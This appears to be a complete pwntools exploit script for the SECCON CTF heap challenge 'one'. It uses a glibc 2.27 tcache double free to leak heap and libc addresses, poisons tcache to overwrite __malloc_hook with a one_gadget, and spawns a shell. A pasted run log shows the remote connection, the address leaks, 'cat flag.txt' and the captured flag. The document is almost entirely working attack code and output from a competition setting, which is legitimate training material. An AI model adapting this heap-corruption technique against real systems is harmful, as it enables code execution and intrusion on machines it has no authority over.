#!/usr/bin/python
from pwn import *
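# NOTE: written against Python 2 pwntools (str-based tubes): further down,
# p64()/p8() results are concatenated with '' literals, which breaks on
# Python 3 where they are bytes.
context.terminal = ['tmux', 'sp', '-h']  # terminal pwntools spawns for new windows (horizontal tmux split)
# context.log_level = 'DEBUG'  # uncomment to dump every byte exchanged on the tube

# Challenge binary as distributed (hash suffix is part of the file name).
elf = ELF('./one_ef36d5ef6169aeda65259f627f282930b93cf6e5')

# Flip to False to attack the challenge server instead of a local process.
# CAVEAT: every libc offset hard-coded later in this script (the leaked
# main_arena pointer, __malloc_hook, the one_gadget) was taken from the
# remote libc-2.27 build; a local run only behaves the same if the local
# libc is that exact build.
local = True
if local:
    # Only libc.address is used from this object, but it must still be the C
    # library itself — not the dynamic loader (ld-2.27.so), whose layout has
    # nothing to do with the offsets used below.
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so', checksec = False)
    io = process(elf.path)
else:
    libc = ELF('./libc-2.27.so_18292bd12d37bfaf58e8dded9db7f1f5da1192cb', checksec = False)
    io = remote('one.chal.seccon.jp', 18357)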
def add(data, shell = False):
    """Menu option 1: store a new memo.

    ``data`` is sent at the 'memo > ' prompt.  With ``shell=True`` the prompt
    is neither awaited nor answered; the exploit's last call uses this,
    presumably because the hijacked malloc hook fires before the prompt is
    ever printed.
    """
    io.sendlineafter('> ', '1')
    if shell:
        return
    io.sendlineafter('memo > ', data)
def show():
    """Menu option 2: print the memo.

    Returns the raw bytes the program emits up to (not including) the
    newline + 'Done.' terminator, i.e. the memo contents as dumped.
    """
    io.sendlineafter('> ', '2')
    dumped = io.recvuntil('\nDone.', drop = True)
    return dumped
def delete():
    """Menu option 3: free the memo.  No further prompt is waited for."""
    io.sendlineafter('> ', '3')
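# Offsets into the libc-2.27 build the challenge ships.  They were resolved by
# hand rather than through pwntools symbols (see the __malloc_hook note
# below), so they must be re-derived for any other libc build.
MAIN_ARENA_LEAK_OFF = 0x3ebca0  # libc base -> pointer leaked from a freed chunk's fd (inside main_arena)
MALLOC_HOOK_OFF = 0x3ebc30      # __malloc_hook@@GLIBC_2.2.5
ONE_GADGET_OFF = 0x4f322        # one_gadget execve('/bin/sh'); its register/stack constraints must hold at the hook call

# Stage 1 - heap leak.  The memo carries a fake chunk header at offset 16:
# prev_size 0, size 0x141 (0x140 | PREV_INUSE), then two zero qwords.
fake_chunk = ''
fake_chunk += p64(0x0) + p64(0x141)
fake_chunk += p64(0x0) * 2
add(p8(0x0) * 16 + fake_chunk)
delete()
delete()  # double free; relies on glibc 2.27 tcache not detecting it
# The chunk's tcache 'next' pointer now reads back as a heap address.
heap_leak = u64(show().ljust(8, '\x00'))
if heap_leak == 0 or heap_leak & 0xf:
    # tcache 'next' points at 16-byte aligned user data; anything else means
    # the layout assumptions do not hold for this binary/libc, so stop here.
    log.error('Unexpected heap leak: ' + hex(heap_leak))
log.success('Leaked heap address: ' + hex(heap_leak))

# Stage 2 - tcache poisoning.  Overwrite the freed chunk's 'next' pointer so
# the allocator hands out heap_leak - 0x1260 (the tcache_perthread_struct
# counters, per the original author), then rewrite the counts.  Byte 18 is
# the count for the 0x140 bin and 7 appears to mark it full, which is what
# later pushes a 0x140-sized free past tcache into the unsorted bin.
add(p64(heap_leak - 0x1260))
add('')
add(p8(0x0) * 3 + p8(0x3) + p8(0x0) * 14 + p8(0x07))  # modify tcache_perthread counter array
# Lay out further memos carrying the same 0x140 / 0x141 header pair.
add('')
add('')
add('')
add(p8(0x0) * 0x10 + p64(0x140) + p64(0x141))
add('')
add('')
add('')
add(p8(0x0) * 0x10 + p64(0x140) + p64(0x141))

# Stage 3 - libc leak.  Double free again, redirect 'next' to heap_leak + 0x20,
# and free a chunk that now lands outside tcache: its fd points into
# main_arena and is read back through show().
delete()
delete()
add(p64(heap_leak + 0x20))
add('')
add('')
delete()
libc_leak = u64(show().ljust(8, '\x00'))
libc.address = libc_leak - MAIN_ARENA_LEAK_OFF
if libc.address & 0xfff:
    # libc is mapped page-aligned.  A misaligned base means the leak or
    # MAIN_ARENA_LEAK_OFF does not match this libc build; abort rather than
    # write into a garbage __malloc_hook address.
    log.error('libc base is not page-aligned: ' + hex(libc.address))
log.success('Leaked main_arena@@GLIBC: ' + hex(libc_leak))
log.info('GLIBC base address: ' + hex(libc.address))
log.info('__malloc_hook@@GLIBC address: ' + hex(libc.address + MALLOC_HOOK_OFF))
log.info('One gadget address: ' + hex(libc.address + ONE_GADGET_OFF))

# Stage 4 - hijack __malloc_hook.  One more double free + poison to get a
# chunk at __malloc_hook, write the one_gadget there, then trigger malloc()
# without waiting for the memo prompt (the hook fires first).
add('')
delete()
delete()
add(p64(libc.address + MALLOC_HOOK_OFF))  # __malloc_hook@@GLIBC_2.2.5 (hand-resolved; pwntools symbol lookup did not work here)
add('')
add(p64(libc.address + ONE_GADGET_OFF))  # one_gadget
add('', shell = True)
io.interactive()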
'''
kaorz@lab:~/seccon/one$ python xpl.py
[*] '/seccon/one/one_ef36d5ef6169aeda65259f627f282930b93cf6e5'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to one.chal.seccon.jp on port 18357: Done
[+] Leaked heap address: 0x55a1e9792270
[+] Leaked main_arena@@GLIBC: 0x7f2537b1eca0
[+] GLIBC base address: 0x7f2537733000
[*] Switching to interactive mode
$ ls
flag.txt
one
$ cat flag.txt
SECCON{4r3_y0u_u53d_70_7c4ch3?}
'''